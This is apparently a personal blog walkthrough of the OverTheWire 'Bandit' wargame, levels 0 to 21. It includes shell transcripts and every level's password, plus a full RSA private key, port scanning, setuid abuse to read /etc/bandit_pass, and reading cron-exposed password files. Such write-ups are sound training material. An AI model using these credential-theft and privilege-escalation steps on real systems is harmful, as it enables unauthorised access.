Recently I’ve been obsessed with a wargaming site called overthewire.org. At the time of this writing I have made it through a few of the servers already, but I will post my solutions to the entry level server they offer, “Bandit”. This is also the recommended place to start if you are new to the site. You should already be familiar with basic Linux commands before attempting this wargame. However, the first page of Bandit explains what to do if you don’t know a command. You do need to use a bit of your own intuition to figure out how to make it from one level to the next.
I have been through a good handful of wargaming sites in the past and I find this one to be of good quality with an interesting variety of servers to play. For those who don’t know what a wargame is, a wargame in hacking is a security challenge in which one must exploit a vulnerability in a system or application or gain access to a computer system. Most of the servers here are about program exploitation on the Linux platform. We do not have to be on a Linux system to play these. But why not? If you have access to a Linux box, a real terminal is the way to go. Putty is the way to go on Windows. But I digress, use my posted solutions to learn and understand the levels or compare with your own solutions. Enjoy!
Level 0:
We simply ssh to bandit0@bandit.labs.overthewire.org using the password bandit0 and we are in our shell.
Level 0 -> 1:
Once in, we can see that the readme file is in our home directory. Simply “cat” it and grab the password for level1.
bandit0@melissa:~$ ls readme bandit0@melissa:~$ cat readme boJ9jbbUNNfktd78OOpsqOltutMc3MY1
Level 1-> 2:
We are told that the password is in a file called “-“. We need to delimit the dash to read it.
bandit1@melissa:~$ ls - bandit1@melissa:~$ cat ./- CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
Level 2 ->3:
This time we simply need to read a file with spaces in it’s name. Let’s surround the file name in quotes.
bandit2@melissa:~$ ls spaces in this filename bandit2@melissa:~$ cat "spaces in this filename" UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK
Level 3->4:
We are told the file we need is in a hidden file in the inhere directory.
bandit3@melissa:~$ ls inhere bandit3@melissa:~$ cd inhere bandit3@melissa:~/inhere$ ls -la total 12 drwxr-xr-x 2 root root 4096 2012-05-10 23:51 . drwxr-xr-x 3 root root 4096 2012-05-10 23:51 .. -rw-r----- 1 bandit4 bandit3 33 2012-05-10 23:51 .hidden bandit3@melissa:~/inhere$ cat .hidden pIwrPrtPN36QITSp3EQaw936yaFoFgAB
Level 4 ->5:
We are told the password is somewhere in the inhere directory and is the only human readable file in the directory. Let’s see what file types we have.
bandit4@melissa:~$ ls inhere bandit4@melissa:~$ cd inhere bandit4@melissa:~/inhere$ ls -la total 48 drwxr-xr-x 2 root root 4096 2012-05-10 23:51 . drwxr-xr-x 3 root root 4096 2012-05-10 23:51 .. -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file00 -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file01 -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file02 -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file03 -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file04 -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file05 -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file06 -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file07 -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file08 -rw-r----- 1 bandit5 bandit4 33 2012-05-10 23:51 -file09 bandit4@melissa:~/inhere$ file ./-* ./-file00: data ./-file01: data ./-file02: data ./-file03: data ./-file04: data ./-file05: data ./-file06: data ./-file07: ASCII text ./-file08: data ./-file09: data bandit4@melissa:~/inhere$ cat ./-file07 koReBOKuIDDepwhWk7jZC0RTdopnAYKh
Level 5-> 6:
This is similar to the previous, except we have some more file attributes to look for. As well as more files to look through.
bandit5@melissa:~$ ls inhere bandit5@melissa:~$ cd inhere bandit5@melissa:~/inhere$ ls -la total 88 drwxr-x--- 22 root bandit5 4096 2012-05-10 23:51 . drwxr-xr-x 3 root root 4096 2012-05-10 23:51 .. drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere00 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere01 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere02 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere03 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere04 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere05 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere06 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere07 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere08 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere09 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere10 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere11 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere12 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere13 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere14 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere15 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere16 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere17 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere18 drwxr-x--- 2 root bandit5 4096 2012-05-10 23:51 maybehere19 bandit5@melissa:~/inhere$ find ./ -size 1033c ./maybehere07/.file2 bandit5@melissa:~/inhere$ cat ./maybehere07/.file2 DXjZPULLxYr17uwoI01bNLQbtFemEgo7
Level 6->7:
The file can be anywhere on the server, but we are given it’s attributes. This is a job for find. The command attached to the end gets rid of garbage returns and allows viewing of our password file amongst several others with the same attributes.
bandit6@melissa:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null /var/lib/dpkg/info/bandit7.password bandit6@melissa:~$ cat /var/lib/dpkg/info/bandit7.password HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs
Level 7->8:
The password for the next level is stored in the file data.txt next to the word millionth. We can pipe cat to grep for this.
bandit7@melissa:~$ ls data.txt bandit7@melissa:~$ cat data.txt | grep millionth millionth cvX2JJa4CFALtqS87jk27qwqGhBM9plV
Level 8->9:
Here we need to find a unique line among many. We can pipe a few commands together to do this. Note the commands do need to be in this order.
bandit8@melissa:~$ ls data.txt bandit8@melissa:~$ cat data.txt | sort | uniq -u UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR
Level 9->10:
The password for the next level is stored in the file data.txt among of few lines of human-readable strings starting with ‘=’ characters.
bandit9@melissa:~$ ls data.txt bandit9@melissa:~$ strings data.txt | grep '=' ========== the R=ev2, NF=!^ M5Q= ========== password TuI@= ========== iss c =$ w=RO eD=p jR=JlB G========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk :=*1p KA=%
We can see our password string amongst our output.
Level 10->11:
The password for the next level is stored in the file data.txt, which contains base64 encoded data. We need to decode the file.
bandit10@melissa:~$ ls data.txt bandit10@melissa:~$ base64 -d data.txt The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR
Level 11->12:
The password is encoded using simple rot13 encryption. There are many options to solve this including using various scripting languages and simply using an online rot13 decoder. Let’s try a solution in our shell.
bandit11@melissa:~$ ls data.txt bandit11@melissa:~$ cat data.txt | tr a-zA-Z n-za-mN-ZA-M The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
That command is given on the wikipedia page for rot13
Level 12->13:
The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it is necessary to create a directory under /tmp in which you can work using mkdir. We need to decompress and check the file over and over again until we get the right format.
bandit12@melissa:~$ ls data.txt bandit12@melissa:~$ file data.txt data.txt: ASCII text bandit12@melissa:~$ mkdir /tmp/stw bandit12@melissa:~$ cd /tmp/stw bandit12@melissa:/tmp/stw$ xxd -r ~/data.txt > data.txt bandit12@melissa:/tmp/stw$ file data.txt data.txt: gzip compressed data, was "data2.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression bandit12@melissa:/tmp/stw$ zcat data.txt > dataNew bandit12@melissa:/tmp/stw$ ls dataNew data.txt bandit12@melissa:/tmp/stw$ file dataNew dataNew: bzip2 compressed data, block size = 900k bandit12@melissa:/tmp/stw$ bzip2 -d dataNew bzip2: Can't guess original name for dataNew -- using dataNew.out bandit12@melissa:/tmp/stw$ ls dataNew.out data.txt bandit12@melissa:/tmp/stw$ file dataNew.out dataNew.out: gzip compressed data, was "data4.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression bandit12@melissa:/tmp/stw$ zcat dataNew.out > evenNewer bandit12@melissa:/tmp/stw$ ls dataNew.out data.txt evenNewer bandit12@melissa:/tmp/stw$ file evenNewer evenNewer: POSIX tar archive (GNU) bandit12@melissa:/tmp/stw$ tar -xvf evenNewer data5.bin bandit12@melissa:/tmp/stw$ file data5.bin data5.bin: POSIX tar archive (GNU) bandit12@melissa:/tmp/stw$ tar -xvf data5.bin data6.bin bandit12@melissa:/tmp/stw$ file data6.bin data6.bin: bzip2 compressed data, block size = 900k bandit12@melissa:/tmp/stw$ bzip2 -d data6.bin bzip2: Can't guess original name for data6.bin -- using data6.bin.out bandit12@melissa:/tmp/stw$ ls data5.bin data6.bin.out dataNew.out data.txt evenNewer bandit12@melissa:/tmp/stw$ file data6.bin.out data6.bin.out: POSIX tar archive (GNU) bandit12@melissa:/tmp/stw$ tar -xvf data6.bin.out data8.bin bandit12@melissa:/tmp/stw$ file data8.bin data8.bin: gzip compressed data, was "data9.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression bandit12@melissa:/tmp/stw$ zcat data8.bin > lost bandit12@melissa:/tmp/stw$ ls data5.bin data6.bin.out data8.bin dataNew.out data.txt evenNewer lost bandit12@melissa:/tmp/stw$ file lost lost: ASCII English text bandit12@melissa:/tmp/stw$ cat lost The password is <strong>8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL</strong>
At last, we have our password.
Level 13->14:
This one switches things up a little. The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. We need to borrow an SSH key to move on.
bandit13@melissa:~$ ls sshkey.private bandit13@melissa:~$ ssh -i sshkey.private bandit14@localhost Could not create directory '/home/bandit13/.ssh'. The authenticity of host 'localhost (127.0.0.1)' can't be established. RSA key fingerprint is 9d:09:d9:46:84:df:f9:dd:cc:7c:dc:49:a0:95:b2:10. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/bandit13/.ssh/known_hosts). bandit14@melissa:~$ cat /etc/bandit_pass/bandit14 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
And just like that, we are dumped into bandit14’s shell.
Level 14->15:
The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost. Here we have a lesson in telnet. Basically, we will use telnet to connect to localhost on port 30000 and enter the password while we are still in bandit14’s shell.
bandit14@melissa:~$ telnet localhost 30000 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e Correct! BfMYroe26WYalil77FoDi9qh59eK5xNr Connection closed by foreign host.
Level 15->16:
The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption. Now we are using SSL commands. Nothing to it but to do it.
bandit15@melissa:~$ openssl s_client -connect localhost:30001 CONNECTED(00000003) depth=0 /CN=melissa.labs.overthewire.org verify error:num=18:self signed certificate verify return:1 depth=0 /CN=melissa.labs.overthewire.org verify return:1 --- Certificate chain 0 s:/CN=melissa.labs.overthewire.org i:/CN=melissa.labs.overthewire.org --- Server certificate -----BEGIN CERTIFICATE----- MIICyjCCAbICCQDE6DxysXt56TANBgkqhkiG9w0BAQUFADAnMSUwIwYDVQQDExxt ZWxpc3NhLmxhYnMub3ZlcnRoZXdpcmUub3JnMB4XDTEyMDUxMDIxMzYzOVoXDTIy MDUwODIxMzYzOVowJzElMCMGA1UEAxMcbWVsaXNzYS5sYWJzLm92ZXJ0aGV3aXJl Lm9yZzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL85VFz7tV/45RID 5x804dSKyvmZH62lOjAg0NhW7Kbc9L6mmq3EVd4As/kupXYs0d7hCiMjJri0X2e8 GTM+nysxZLTR1qa2j/KOzQ7FgQ4vp4R4JQZP6ofhNPvBybh6BwYE5hFzRARK9Y3x +dr3ZefeAE7Ea1k6NzH7p6HAtpkG36SD6GbhLV9HFhwOCwBWGPnXPfXA/2XBdZzY /h6FWrxZPqdALjy8dCeRlNPqG7dD8CIWK4dpBGudxfyXiki5YfwOirotEWjI1E/C JK2/jWT7tYLIrVKzOF0dwDWYxNMRnwn5+S2F2/AERSRBlwrtMb6jJf+g2pU27eAe 3xvtJs8CAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAtDKEX9gWmEyKqkhPN1L+wjEi M2HH/XMgDxHrqWgy0Xl9gznuvM0pkOEXUOKWkfKDQfskk8cbgqn0hEvaX7AKrNL4 Nbm1JD+hUSSFtW3sxmv+aHkdEz6H70oUp712wP2Hu3DF7paVSPC5yB1vqoNYmHX/ J9CwqptVj+dLaDeY+ayzEwOuaEcd+cpP4OTbMLy0SuKLONr1+NaA5IPaVE/XOmlE wW7zNRcJ3kxnvsHrqF4ZeYPBLNmhDT3ZD4qso+JiL9lme5YbP7+dCQo5Oa1AT7Dz UmKZhWQTLsnI6Eyl8NwLnxiSkIOUigN6WF8bnd1F9FVKfmjQDSjBJHGqTE4Trg== -----END CERTIFICATE----- subject=/CN=melissa.labs.overthewire.org issuer=/CN=melissa.labs.overthewire.org --- No client certificate CA names sent --- SSL handshake has read 1436 bytes and written 229 bytes --- New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA Server public key is 2048 bit Secure Renegotiation IS supported Compression: zlib compression Expansion: zlib compression SSL-Session: Protocol : TLSv1 Cipher : DHE-RSA-AES256-SHA Session-ID: 5AED820CF694E077E4F590C9089FC77A050DC3A3BBCE7F383B811CBD4937DAC9 Session-ID-ctx: Master-Key: 201FB305DD48B3D4746DA988FD88B0EF939A766A393DFED1D9184DA6BD41B28F4ABDF06AE23DA7B0DEFF0329C69499E8 Key-Arg : None TLS session ticket: 0000 - b4 b5 f0 bf 88 14 bc 85-59 9b e6 22 ea f3 7f a1 ........Y..".... 0010 - 61 8a 25 48 a4 08 cb 5c-f0 2d 8a 97 b1 78 c3 eb a.%H...\.-...x.. 0020 - 14 6b 41 99 71 5e 62 6b-bf 6a 17 18 82 cc 69 1a .kA.q^bk.j....i. 0030 - d5 a3 fd 08 97 8c b8 3a-d7 52 7c 01 31 eb c8 be .......:.R|.1... 0040 - 09 a0 fd 58 cc aa d9 98-51 53 71 98 7d 8f 92 78 ...X....QSq.}..x 0050 - 00 8c d3 1d b0 57 df 70-0a af 92 44 6c b8 5e 85 .....W.p...Dl.^. 0060 - 1f e1 87 fd c6 da db bd-35 da 89 a0 b9 da fe 37 ........5......7 0070 - 0f 5b 4e d9 96 16 3b 7e-6b fb 0f 42 51 67 5f d9 .[N...;~k..BQg_. 0080 - 11 9a 8d a3 95 2a 9b d1-f6 9b ce 2c 55 62 92 4b .....*.....,Ub.K 0090 - a8 89 b1 9f 8a b8 f7 6b-b7 65 2d e4 7e 52 6b 6c .......k.e-.~Rkl Compression: 1 (zlib compression) Start Time: 1363810708 Timeout : 300 (sec) Verify return code: 18 (self signed certificate) --- BfMYroe26WYalil77FoDi9qh59eK5xNr Correct! cluFn7wTiGryunymYOu4RcffSxQluehd read:errno=0
After running our SSl command, we paste bandit15’s password into the prompt. We are then presented with bandit16’s password.
Level 16->17:
The password for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next password, the others will simply send back to you whatever you send to it.
Moving up with our network skills we are introduced to nmap. Let’s run some scans to find the listening server. Note netcat can also do basic port scans. Good to know because many systems have that by default and you may be in a situation where you cannot use nmap.
bandit16@melissa:~$ nmap -p 31000-32000 localhost Starting Nmap 5.21 ( http://nmap.org ) at 2013-03-20 21:24 CET Nmap scan report for localhost (127.0.0.1) Host is up (0.0033s latency). Not shown: 996 closed ports PORT STATE SERVICE 31046/tcp open unknown 31518/tcp open unknown 31691/tcp open unknown 31790/tcp open unknown 31960/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds #We can see we have 5 ports open. Nmap does have a script scan to verify SSL, but it does not seem to work on this server. #Thus it's quicker to manually check each port. To speed this up, I will tell you I verified it on port 31790. bandit16@melissa:~$ openssl s_client -connect localhost:31790 CONNECTED(00000003) depth=0 /CN=melissa.labs.overthewire.org verify error:num=18:self signed certificate verify return:1 depth=0 /CN=melissa.labs.overthewire.org verify return:1 --- Certificate chain 0 s:/CN=melissa.labs.overthewire.org i:/CN=melissa.labs.overthewire.org --- Server certificate -----BEGIN CERTIFICATE----- MIICyjCCAbICCQDE6DxysXt56TANBgkqhkiG9w0BAQUFADAnMSUwIwYDVQQDExxt ZWxpc3NhLmxhYnMub3ZlcnRoZXdpcmUub3JnMB4XDTEyMDUxMDIxMzYzOVoXDTIy MDUwODIxMzYzOVowJzElMCMGA1UEAxMcbWVsaXNzYS5sYWJzLm92ZXJ0aGV3aXJl Lm9yZzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL85VFz7tV/45RID 5x804dSKyvmZH62lOjAg0NhW7Kbc9L6mmq3EVd4As/kupXYs0d7hCiMjJri0X2e8 GTM+nysxZLTR1qa2j/KOzQ7FgQ4vp4R4JQZP6ofhNPvBybh6BwYE5hFzRARK9Y3x +dr3ZefeAE7Ea1k6NzH7p6HAtpkG36SD6GbhLV9HFhwOCwBWGPnXPfXA/2XBdZzY /h6FWrxZPqdALjy8dCeRlNPqG7dD8CIWK4dpBGudxfyXiki5YfwOirotEWjI1E/C JK2/jWT7tYLIrVKzOF0dwDWYxNMRnwn5+S2F2/AERSRBlwrtMb6jJf+g2pU27eAe 3xvtJs8CAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAtDKEX9gWmEyKqkhPN1L+wjEi M2HH/XMgDxHrqWgy0Xl9gznuvM0pkOEXUOKWkfKDQfskk8cbgqn0hEvaX7AKrNL4 Nbm1JD+hUSSFtW3sxmv+aHkdEz6H70oUp712wP2Hu3DF7paVSPC5yB1vqoNYmHX/ J9CwqptVj+dLaDeY+ayzEwOuaEcd+cpP4OTbMLy0SuKLONr1+NaA5IPaVE/XOmlE wW7zNRcJ3kxnvsHrqF4ZeYPBLNmhDT3ZD4qso+JiL9lme5YbP7+dCQo5Oa1AT7Dz UmKZhWQTLsnI6Eyl8NwLnxiSkIOUigN6WF8bnd1F9FVKfmjQDSjBJHGqTE4Trg== -----END CERTIFICATE----- subject=/CN=melissa.labs.overthewire.org issuer=/CN=melissa.labs.overthewire.org --- No client certificate CA names sent --- SSL handshake has read 1436 bytes and written 229 bytes --- New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA Server public key is 2048 bit Secure Renegotiation IS supported Compression: zlib compression Expansion: zlib compression SSL-Session: Protocol : TLSv1 Cipher : DHE-RSA-AES256-SHA Session-ID: 913086AEE63018EFB254F2105A4597FC5CB419BFFBCE5B1FAF10EC7967668530 Session-ID-ctx: Master-Key: 155AF180C1B8BB81BDE85105A05F1C6D5E7B8511B6C9E83B257EC2012B102170522C965E114B233D108A838C7520DED6 Key-Arg : None TLS session ticket: 0000 - 95 66 61 4b c2 a6 3c 36-50 d2 8d fd 58 fb 03 30 .faK..<6P...X..0 0010 - 2c 38 20 12 84 02 08 68-d0 f3 5d 47 1a 8a 86 b2 ,8 ....h..]G.... 0020 - 01 19 4f cb 46 85 e8 a2-36 e2 ac fd 9f 2e 66 1e ..O.F...6.....f. 0030 - ab 99 67 49 93 f0 82 0e-56 60 0f 4b c2 28 b6 7b ..gI....V`.K.(.{ 0040 - 7f 55 f9 cf 9d d9 07 0a-4f 40 a6 7d cc 89 4b b4 .U......O@.}..K. 0050 - f3 2a 0e b8 35 ac e9 e3-04 b7 3b e8 b5 32 8b 7a .*..5.....;..2.z 0060 - a8 05 c9 e9 89 74 c4 fc-40 8d 3b 49 2e de 63 be .....t..@.;I..c. 0070 - 25 b5 f5 05 85 17 82 92-8b 95 5c 8b e6 e9 f3 e7 %.........\..... 0080 - 21 49 9b a6 b8 82 fc d8-6e 67 54 31 ad a3 75 ee !I......ngT1..u. 0090 - 43 07 47 54 bb fa d9 9a-2a ef 20 85 28 2d 2b 63 C.GT....*. .(-+c Compression: 1 (zlib compression) Start Time: 1363811727 Timeout : 300 (sec) Verify return code: 18 (self signed certificate) --- cluFn7wTiGryunymYOu4RcffSxQluehd Correct! -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama +TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT 8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM 77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3 vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY= -----END RSA PRIVATE KEY----- read:errno=0 #Now we have an ssh key we can use. We need to copy it into a file to it. bandit16@melissa:~$ mkdir /tmp/ssss bandit16@melissa:~$ cd /tmp/ssss bandit16@melissa:/tmp/ssss$ touch sshkey.private bandit16@melissa:/tmp/ssss$ vi sshkey.private bandit16@melissa:/tmp/ssss$ chmod 600 sshkey.private bandit16@melissa:/tmp/ssss$ ssh -i sshkey.private bandit17@localhost Could not create directory '/home/bandit16/.ssh'. The authenticity of host 'localhost (127.0.0.1)' can't be established. RSA key fingerprint is 9d:09:d9:46:84:df:f9:dd:cc:7c:dc:49:a0:95:b2:10. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/bandit16/.ssh/known_hosts). bandit17@melissa:~$
At last, we have bandit17’s shell.
Level 17->18:
There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new.
There are a few ways to find the password for this level. One of the commands not mentioned makes really light work of this level, so we will go with that. Always remember, there is more than one way to skin a cat, especially with Linux.
bandit17@melissa:~$ ls passwords.new passwords.old bandit17@melissa:~$ diff passwords.new passwords.old 42c42 < kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd --- > bECYSoXjOeGseirUCztuCBDF3xXqE7By
The string on top is what we want. A brief of level 18 introduces a new problem with our password…
Level 18->19:
The password for the next level is stored in a file readme in the home directory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH. When we try to connect to the shell at bandit18, we are presented with an error message. There is a way to sneak in commands when we try to connect. Let’s see.
Byebye ! Connection to bandit.labs.overthewire.org closed. ssh bandit18@bandit.labs.overthewire.org cat readme bandit18@bandit.labs.overthewire.org's password: IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
The password for bandit19 is presented to us just like that.
Level 19->20:
To gain access to the next level, you should use the setuid binary in the home directory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used to setuid binary.
The suid binary executes as bandit20, therefore we can exploit this to peek at bandit20’s password as bandit19. Example:
bandit19@melissa:~$ ls bandit20-do bandit19@melissa:~$ ./bandit20-do Run a command as another user. Example: ./bandit20-do id bandit19@melissa:~$ ./bandit20-do id uid=11019(bandit19) gid=11019(bandit19) euid=11020(bandit20) groups=11020(bandit20),11019(bandit19) bandit19@melissa:~$ ./bandit20-do whoami bandit20 bandit19@melissa:~$ ./bandit20-do cat /etc/bandit_pass/bandit20 GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Level 20->21:
There is a setuid binary in the home directory that does the following: it makes a connection to localhost on the port you specify as a command line argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).
This one is a little more complicated. Upon entering bandit20’s shell, we see a binary that connects to a local port, and waits for a connection and the password to be sent to it from outside. We need two shells to accomplish this.
bandit20@melissa:~$ ls suconnect bandit20@melissa:~$ ./suconnect Usage: ./suconnect <portnumber> This program will connect to the given port on localhost using TCP. If it receives the correct password from the other side, the next password is transmitted back. #In one shell do: bandit20@melissa:~$ nc -l 3222 #In another shell do: bandit20@melissa:~$ ls suconnect bandit20@melissa:~$ ./suconnect 3222 #When the connection is made, go back to the first shell, and paste the password in netcat. GbKksEFF4yrVs6il55v6gwY5aVje5f0j gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j Password matches, sending next password
The password for bandit21 is given, we can move on.
Level 21->22:
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
If you are not already familiar with what cron jobs are, you will learn now. Upon inspection of the cron directory, we see a job listed for bandit22. The contents of it shows that it executes a script that dumps the password for bandit22 to a file in /tmp. Looking at the contents of that file reveals the password for bandit22.
bandit21@melissa:~$ cd /etc/cron.d/ bandit21@melissa:/etc/cron.d$ ls -la total 100 drwxr-xr-x 2 root root 4096 2013-01-03 16:39 . drwxr-xr-x 94 root root 4096 2013-03-18 15:53 .. -rw-r--r-- 1 root root 54 2013-01-03 16:39 boobiesbot-check -rw-r--r-- 1 root root 61 2012-07-05 09:34 cronjob_bandit22 -rw-r--r-- 1 root root 61 2012-07-05 09:34 cronjob_bandit23 -rw-r--r-- 1 root root 61 2012-07-05 09:35 cronjob_bandit24 -rw-r--r-- 1 root root 35 2012-03-29 14:16 eloi0 -rw-r--r-- 1 root root 35 2012-04-07 18:33 eloi1 -rw-r--r-- 1 root root 51 2012-12-23 00:06 hintbot-check -rw------- 1 root root 233 2012-09-14 13:16 manpage3_resetpw_job -rw-r--r-- 1 root root 506 2012-06-19 03:06 php5 -rw-r--r-- 1 root root 102 2011-01-05 11:23 .placeholder -rw-r--r-- 1 root root 58 2011-11-13 23:08 semtex0-32 -rw-r--r-- 1 root root 58 2011-11-13 23:08 semtex0-64 -rw-r--r-- 1 root root 59 2011-11-13 23:08 semtex0-ppc -rw-r--r-- 1 root root 36 2011-11-25 14:00 semtex10 -rw-r--r-- 1 root root 143 2011-11-13 23:08 semtex12 -rw-r--r-- 1 root root 35 2011-11-13 23:08 semtex5 -rw-r--r-- 1 root root 29 2011-11-13 23:08 semtex6 -rw-r--r-- 1 root root 96 2011-11-25 14:00 semtex8 -rw-r--r-- 1 root root 134 2011-11-13 23:14 semtex9 -rw-r--r-- 1 root root 29 2011-11-13 23:07 vortex0 -rw-r--r-- 1 root root 30 2012-03-24 21:00 vortex20 -rw-r--r-- 1 root root 52 2012-12-23 00:06 vulnbot0-check -rw-r--r-- 1 root root 52 2012-12-23 00:06 vulnbot1-check bandit21@melissa:/etc/cron.d$ cat cronjob_bandit22 * * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null bandit21@melissa:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh #!/bin/bash chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv bandit21@melissa:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv 